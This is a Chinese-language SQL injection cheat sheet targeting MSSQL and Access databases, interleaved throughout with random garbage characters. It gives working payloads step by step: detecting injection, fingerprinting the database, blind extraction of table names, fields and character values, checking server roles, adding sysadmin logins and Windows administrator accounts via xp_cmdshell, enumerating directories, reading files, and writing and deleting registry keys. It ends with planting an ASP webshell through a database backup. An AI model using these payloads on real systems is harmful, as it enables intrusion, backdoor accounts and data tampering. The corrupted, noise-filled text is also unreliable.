1.判断是否有注入;and 1=1 ;and 1=2 �T�(��U_
2.初步判断是否是mssql ;and user>0 �5fd]v�<��
t:'Mh�9h7u
3.注入参数是字符'and [查询条件] and ''=' wY[+Z�T��
NU5��.o$
4.搜索时没过滤参数的'and [查询条件] and '%25'=' OG>}M$�Ora
,,q1�0iF��
5.判断数据库系统 �9�-fLz?J
��&7K?��w~
;and (select count(*) from sysobjects)>0 mssql cWe"%���I�
KV0]m�^@�x
;and (select count(*) from msysobjects)>0 access ���
��2*^j
�xD~5�UER�
YwjK�Ay�LU
J^Wa8Q;9lX
6.猜数据库 ;and (select Count(*) from [数据库名])>0 [J?�aD`{#O
F^]�;�U�+J
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 k�Y-N>��E:
Z/D�x,zI�R
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ;'#�8tGv�=
<�^5�Z:n!q
9.(1)猜字段的ascii值(access) t*1fLumXR�
7`DBS^O]dG
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 $��#�9;)8J
�.uMn0PE �
(2)猜字段的ascii值(mssql) ] Zy5%gI��
"�hH.#5��j
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 3s�y� �(vC
;;6uw\6
O�
10.测试权限结构(mssql) V{/�?FO�?E
a�%/9�v"�}
s@��K4u^$A
.����$+#1-
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 61�k"p2?�+
��0=2��@��
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- b*c*r d�Tx
*zb�Nd:�i9
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- |�B.Y6L6l�
5�K>3My��#
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ~j}c�y�Hg�
5m&9"T.��w
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- `��ZyI!"��
/
F4z���g3
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- k�e�L&b/@
!>..�Q�)z�
;and 1=(select IS_MEMBER('db_owner'));-- �@t�Nz��Q8
R;uvkg�[�o
FKDk�+�ojw
�FWrX3i���
11.添加mssql和系统的帐户 hK��L4cpK4
f!Y?�S����
;exec master.dbo.sp_addlogin username;-- �5�YE'��L.
;exec master.dbo.sp_password null,username,password;-- �DgId_\Z�e
R�3�gd�La.
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Ez�c?�#<+7
e>+i>/Fn{h
;exec master.dbo.xp_cmdshell 'net user username password 3no%E0�3�p
`�T@i.��'X
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �Lt?lv2k=L
�Y']\Jq{OS
;exec master.dbo.xp_cmdshell 'net user username password /add';-- E�7j�(QO�f
tk�eoN�uAM
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ZxGJzakB5$
}YG�V\Nu��
B~MU�^�|v�
&�^� 1�$^=
12.(1)遍历目录 +"
.X
)avF
!Xf5e*1I�S
;create table dirs(paths varchar(100), id int) `u3E�U*~�W
BC&S>��#\�
;insert dirs exec master.dbo.xp_dirtree 'c:\' N{9v��1`B
*�2p�t%eav
;and (select top 1 paths from dirs)>0 Gp�?a(�-K5
�[B\h$IcRv
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �xHv�ZV<�#
B+P(M�!m�3
4gI�/!,J(b
j�S]�ru-5.
(2)遍历目录 +%�yfc�yZ.
x kx^%3d�V
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 8�1�? �hY4
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 +h|`/ &,��
%(3|R@G�.
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 DE}K~}sbd�
+\d56�j+D�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 t<�.)Z-Ii�
Az�a /6OL�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 dk[!V1x4�\
yj 3cyLXw�
5d� Eh7X�L
�S�YA�y�k�
13.mssql中的存储过程 [�kV�S�
�O
a!6�{:8Zi0
xp_regenumvalues 注册表根键, 子键 de�BY�5�|�
�q/4�J.j�L
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �9�UdM`v)(
��rK'�L6o
xp_regread 根键,子键,键值名 EH+"~-v)ae
u^@f&BIG]:
;exec xp_regread �}����eCw6
H%q���sjB^
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �1g�L��2ia
b�|l:fT?&�
xp_regwrite 根键,子键, 值名, 值类型, 值 j�/323�Za+
�`uv2H��$�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �W#9B�NKL
tU�}�h~&M�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �@K � �&GJ
B�3p�Cy~*5
xp_regdeletevalue 根键,子键,值名 o |{5M�|nD
\tf��<B\oa
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 !�`Fx�a4i>
E����c3}_`
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 D�=�q:*x
l:
HTk4�$0
h]IxXP?h�[
sXL��q*b�?
14.mssql的backup创建webshell �^b��GNq
X
�L�M:v�sG�
use model BRw .��]&/
y�`<�*U;xL
create table cmd(str image); ��.5^cb%B*
^n*)7��K[
insert into cmd(str) values (''); e(]�!G���A
ePOG}k($/%
backup database model to disk='c:\l.asp'; ],@�r�S�9K
C)�[,4wt�,
@�E&J�_u�n
NW~��N}5�T
15.mssql内置函数 so�,�t����
,`'Q��i�%O
;and (select @@version)>0 获得Windows的版本号 @6Y?\W�x$w
v [wb~�uw\
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �:�}H�e�\V
9P1OP Xv*p
;and (select user_name())>0 爆当前系统的连接用户 (!�u�x+��K
�)tC5Hijq,
;and (select db_name())>0 得到当前连接的数据库 8���}I$�'x
�Ld�YB7T,
�v> LIvi|]
h9�t$Uz^�N
16.简洁的webshell MU`1��LHg
0at/c�-K`�
use model �R6` �W�N
iOd&B�B�6�
create table cmd(str image); <wk!hT�m�W
qmkAg �}2�
insert into cmd(str) values (''); HZ aV7dOZ8
_F6OM5F"N�
backup database model to disk='g:\wwwtest\l.asp';
